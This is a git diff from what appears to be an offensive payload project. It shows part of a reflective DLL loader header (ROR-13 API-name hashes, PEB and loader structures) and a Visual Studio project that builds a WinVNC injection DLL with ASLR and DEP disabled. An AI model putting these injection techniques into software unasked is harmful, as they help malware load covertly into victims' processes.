||||||
#define EXITFUNC_PROCESS 0x56A2B5F0
|
|
||||||
|
|
||||||
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
|
|
||||||
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
|
|
||||||
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
|
|
||||||
|
|
||||||
#define KERNEL32DLL_HASH 0x6A4ABC5B
|
|
||||||
#define LOADLIBRARYA_HASH 0xEC0E4E8E
|
|
||||||
#define GETPROCADDRESS_HASH 0x7C0DFCAA
|
|
||||||
#define VIRTUALALLOC_HASH 0x91AFCA54
|
|
||||||
|
|
||||||
#define HASH_KEY 13
|
|
||||||
//===============================================================================================//
|
|
||||||
#pragma intrinsic( _rotr )
|
|
||||||
|
|
||||||
__forceinline DWORD ror( DWORD d )
|
|
||||||
{
|
|
||||||
return _rotr( d, HASH_KEY );
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
__forceinline DWORD hash( char * c )
|
|
||||||
{
|
|
||||||
register DWORD h = 0;
|
|
||||||
do
|
|
||||||
{
|
|
||||||
h = ror( h );
|
|
||||||
h += *c;
|
|
||||||
} while( *++c );
|
|
||||||
|
|
||||||
return h;
|
|
||||||
}
|
|
||||||
//===============================================================================================//
|
|
||||||
typedef struct _UNICODE_STR
|
|
||||||
{
|
|
||||||
USHORT Length;
|
|
||||||
USHORT MaximumLength;
|
|
||||||
PWSTR pBuffer;
|
|
||||||
} UNICODE_STR, *PUNICODE_STR;
|
|
||||||
|
|
||||||
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
|
|
||||||
//__declspec( align(8) )
|
|
||||||
typedef struct _LDR_DATA_TABLE_ENTRY
|
|
||||||
{
|
|
||||||
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
|
|
||||||
LIST_ENTRY InMemoryOrderModuleList;
|
|
||||||
LIST_ENTRY InInitializationOrderModuleList;
|
|
||||||
PVOID DllBase;
|
|
||||||
PVOID EntryPoint;
|
|
||||||
ULONG SizeOfImage;
|
|
||||||
UNICODE_STR FullDllName;
|
|
||||||
UNICODE_STR BaseDllName;
|
|
||||||
ULONG Flags;
|
|
||||||
SHORT LoadCount;
|
|
||||||
SHORT TlsIndex;
|
|
||||||
LIST_ENTRY HashTableEntry;
|
|
||||||
ULONG TimeDateStamp;
|
|
||||||
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
|
|
||||||
|
|
||||||
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
|
|
||||||
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
|
|
||||||
{
|
|
||||||
DWORD dwLength;
|
|
||||||
DWORD dwInitialized;
|
|
||||||
LPVOID lpSsHandle;
|
|
||||||
LIST_ENTRY InLoadOrderModuleList;
|
|
||||||
LIST_ENTRY InMemoryOrderModuleList;
|
|
||||||
LIST_ENTRY InInitializationOrderModuleList;
|
|
||||||
LPVOID lpEntryInProgress;
|
|
||||||
} PEB_LDR_DATA, * PPEB_LDR_DATA;
|
|
||||||
|
|
||||||
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
|
|
||||||
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
|
|
||||||
{
|
|
||||||
struct _PEB_FREE_BLOCK * pNext;
|
|
||||||
DWORD dwSize;
|
|
||||||
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
|
|
||||||
|
|
||||||
// struct _PEB is defined in Winternl.h but it is incomplete
|
|
||||||
// WinDbg> dt -v ntdll!_PEB
|
|
||||||
typedef struct __PEB // 65 elements, 0x210 bytes
|
|
||||||
{
|
|
||||||
BYTE bInheritedAddressSpace;
|
|
||||||
BYTE bReadImageFileExecOptions;
|
|
||||||
BYTE bBeingDebugged;
|
|
||||||
BYTE bSpareBool;
|
|
||||||
LPVOID lpMutant;
|
|
||||||
LPVOID lpImageBaseAddress;
|
|
||||||
PPEB_LDR_DATA pLdr;
|
|
||||||
LPVOID lpProcessParameters;
|
|
||||||
LPVOID lpSubSystemData;
|
|
||||||
LPVOID lpProcessHeap;
|
|
||||||
PRTL_CRITICAL_SECTION pFastPebLock;
|
|
||||||
LPVOID lpFastPebLockRoutine;
|
|
||||||
LPVOID lpFastPebUnlockRoutine;
|
|
||||||
DWORD dwEnvironmentUpdateCount;
|
|
||||||
LPVOID lpKernelCallbackTable;
|
|
||||||
DWORD dwSystemReserved;
|
|
||||||
DWORD dwAtlThunkSListPtr32;
|
|
||||||
PPEB_FREE_BLOCK pFreeList;
|
|
||||||
DWORD dwTlsExpansionCounter;
|
|
||||||
LPVOID lpTlsBitmap;
|
|
||||||
DWORD dwTlsBitmapBits[2];
|
|
||||||
LPVOID lpReadOnlySharedMemoryBase;
|
|
||||||
LPVOID lpReadOnlySharedMemoryHeap;
|
|
||||||
LPVOID lpReadOnlyStaticServerData;
|
|
||||||
LPVOID lpAnsiCodePageData;
|
|
||||||
LPVOID lpOemCodePageData;
|
|
||||||
LPVOID lpUnicodeCaseTableData;
|
|
||||||
DWORD dwNumberOfProcessors;
|
|
||||||
DWORD dwNtGlobalFlag;
|
|
||||||
LARGE_INTEGER liCriticalSectionTimeout;
|
|
||||||
DWORD dwHeapSegmentReserve;
|
|
||||||
DWORD dwHeapSegmentCommit;
|
|
||||||
DWORD dwHeapDeCommitTotalFreeThreshold;
|
|
||||||
DWORD dwHeapDeCommitFreeBlockThreshold;
|
|
||||||
DWORD dwNumberOfHeaps;
|
|
||||||
DWORD dwMaximumNumberOfHeaps;
|
|
||||||
LPVOID lpProcessHeaps;
|
|
||||||
LPVOID lpGdiSharedHandleTable;
|
|
||||||
LPVOID lpProcessStarterHelper;
|
|
||||||
DWORD dwGdiDCAttributeList;
|
|
||||||
LPVOID lpLoaderLock;
|
|
||||||
DWORD dwOSMajorVersion;
|
|
||||||
DWORD dwOSMinorVersion;
|
|
||||||
WORD wOSBuildNumber;
|
|
||||||
WORD wOSCSDVersion;
|
|
||||||
DWORD dwOSPlatformId;
|
|
||||||
DWORD dwImageSubsystem;
|
|
||||||
DWORD dwImageSubsystemMajorVersion;
|
|
||||||
DWORD dwImageSubsystemMinorVersion;
|
|
||||||
DWORD dwImageProcessAffinityMask;
|
|
||||||
DWORD dwGdiHandleBuffer[34];
|
|
||||||
LPVOID lpPostProcessInitRoutine;
|
|
||||||
LPVOID lpTlsExpansionBitmap;
|
|
||||||
DWORD dwTlsExpansionBitmapBits[32];
|
|
||||||
DWORD dwSessionId;
|
|
||||||
ULARGE_INTEGER liAppCompatFlags;
|
|
||||||
ULARGE_INTEGER liAppCompatFlagsUser;
|
|
||||||
LPVOID lppShimData;
|
|
||||||
LPVOID lpAppCompatInfo;
|
|
||||||
UNICODE_STR usCSDVersion;
|
|
||||||
LPVOID lpActivationContextData;
|
|
||||||
LPVOID lpProcessAssemblyStorageMap;
|
|
||||||
LPVOID lpSystemDefaultActivationContextData;
|
|
||||||
LPVOID lpSystemAssemblyStorageMap;
|
|
||||||
DWORD dwMinimumStackCommit;
|
|
||||||
} _PEB, * _PPEB;
|
|
||||||
|
|
||||||
typedef struct
|
|
||||||
{
|
|
||||||
WORD offset:12;
|
|
||||||
WORD type:4;
|
|
||||||
} IMAGE_RELOC, *PIMAGE_RELOC;
|
|
||||||
//===============================================================================================//
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
|
@ -70,7 +70,7 @@ class VSocket;
|
||||||
////////////////////////////////////////////////////////
|
////////////////////////////////////////////////////////
|
||||||
// *** Lovely hacks to make Win32 work. Hurrah!
|
// *** Lovely hacks to make Win32 work. Hurrah!
|
||||||
|
|
||||||
#ifdef __WIN32__
|
#if defined(__WIN32__) && !defined(EWOULDBLOCK)
|
||||||
#define EWOULDBLOCK WSAEWOULDBLOCK
|
#define EWOULDBLOCK WSAEWOULDBLOCK
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,473 @@
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Debug|x64">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|Win32">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|x64">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
</ItemGroup>
|
||||||
|
<PropertyGroup Label="Globals">
|
||||||
|
<ProjectName>winvnc</ProjectName>
|
||||||
|
<ProjectGuid>{EA6A09AC-04BB-423D-8842-CA48DF901058}</ProjectGuid>
|
||||||
|
<RootNamespace>WinVNC</RootNamespace>
|
||||||
|
<SccLocalPath>.</SccLocalPath>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<UseOfMfc>false</UseOfMfc>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<UseOfMfc>false</UseOfMfc>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<UseOfMfc>false</UseOfMfc>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<UseOfMfc>false</UseOfMfc>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
|
||||||
|
</ImportGroup>
|
||||||
|
<PropertyGroup Label="UserMacros" />
|
||||||
|
<PropertyGroup>
|
||||||
|
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<IgnoreImportLibrary>true</IgnoreImportLibrary>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<EmbedManifest>false</EmbedManifest>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<TargetExt>.dll</TargetExt>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<IgnoreImportLibrary>true</IgnoreImportLibrary>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<EmbedManifest>false</EmbedManifest>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<TargetExt>.dll</TargetExt>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<IgnoreImportLibrary>true</IgnoreImportLibrary>
|
||||||
|
<LinkIncremental>true</LinkIncremental>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<TargetExt>.dll</TargetExt>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<IgnoreImportLibrary>true</IgnoreImportLibrary>
|
||||||
|
<LinkIncremental>true</LinkIncremental>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<TargetExt>.dll</TargetExt>
|
||||||
|
</PropertyGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<Midl>
|
||||||
|
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MkTypLibCompatible>true</MkTypLibCompatible>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<TargetEnvironment>Win32</TargetEnvironment>
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<StringPooling>true</StringPooling>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<BrowseInformation>true</BrowseInformation>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<CompileAs>Default</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<Culture>0x0409</Culture>
|
||||||
|
</ResourceCompile>
|
||||||
|
<PreLinkEvent>
|
||||||
|
<Command />
|
||||||
|
</PreLinkEvent>
|
||||||
|
<Link>
|
||||||
|
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
|
||||||
|
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
|
||||||
|
<MapExports>true</MapExports>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention>false</DataExecutionPrevention>
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<Midl>
|
||||||
|
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MkTypLibCompatible>true</MkTypLibCompatible>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<TargetEnvironment>X64</TargetEnvironment>
|
||||||
|
<GenerateTypeLibrary>false</GenerateTypeLibrary>
|
||||||
|
<HeaderFileName />
|
||||||
|
<DllDataFileName />
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x64__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<StringPooling>true</StringPooling>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<BrowseInformation>true</BrowseInformation>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<CompileAs>Default</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<Culture>0x0409</Culture>
|
||||||
|
</ResourceCompile>
|
||||||
|
<PreLinkEvent>
|
||||||
|
<Command />
|
||||||
|
</PreLinkEvent>
|
||||||
|
<Link>
|
||||||
|
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
|
||||||
|
<SuppressStartupBanner>false</SuppressStartupBanner>
|
||||||
|
<ManifestFile />
|
||||||
|
<MapExports>false</MapExports>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<RandomizedBaseAddress />
|
||||||
|
<DataExecutionPrevention />
|
||||||
|
<TargetMachine>NotSet</TargetMachine>
|
||||||
|
<AllowIsolation>true</AllowIsolation>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<Midl>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MkTypLibCompatible>true</MkTypLibCompatible>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<TargetEnvironment>Win32</TargetEnvironment>
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<BufferSecurityCheck>true</BufferSecurityCheck>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<CompileAs>Default</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<Culture>0x0809</Culture>
|
||||||
|
</ResourceCompile>
|
||||||
|
<Link>
|
||||||
|
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
|
||||||
|
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention />
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<Midl>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MkTypLibCompatible>true</MkTypLibCompatible>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<TargetEnvironment>X64</TargetEnvironment>
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<BufferSecurityCheck>true</BufferSecurityCheck>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<CompileAs>Default</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<Culture>0x0809</Culture>
|
||||||
|
</ResourceCompile>
|
||||||
|
<Link>
|
||||||
|
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
|
||||||
|
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention />
|
||||||
|
<TargetMachine>MachineX64</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="vncdll.cpp" />
|
||||||
|
<ClCompile Include="vncEncodeCoRRE.cpp" />
|
||||||
|
<ClCompile Include="vncEncodeHexT.cpp" />
|
||||||
|
<ClCompile Include="vncEncoder.cpp" />
|
||||||
|
<ClCompile Include="vncEncodeRRE.cpp" />
|
||||||
|
<ClCompile Include="vncEncodeTight.cpp" />
|
||||||
|
<ClCompile Include="vncEncodeZlib.cpp" />
|
||||||
|
<ClCompile Include="vncEncodeZlibHex.cpp" />
|
||||||
|
<ClCompile Include="omnithread\nt.cpp" />
|
||||||
|
<ClCompile Include="libjpeg\jcapimin.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcapistd.c" />
|
||||||
|
<ClCompile Include="libjpeg\jccoefct.c" />
|
||||||
|
<ClCompile Include="libjpeg\jccolor.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcdctmgr.c" />
|
||||||
|
<ClCompile Include="libjpeg\jchuff.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcinit.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcmainct.c" />
|
||||||
|
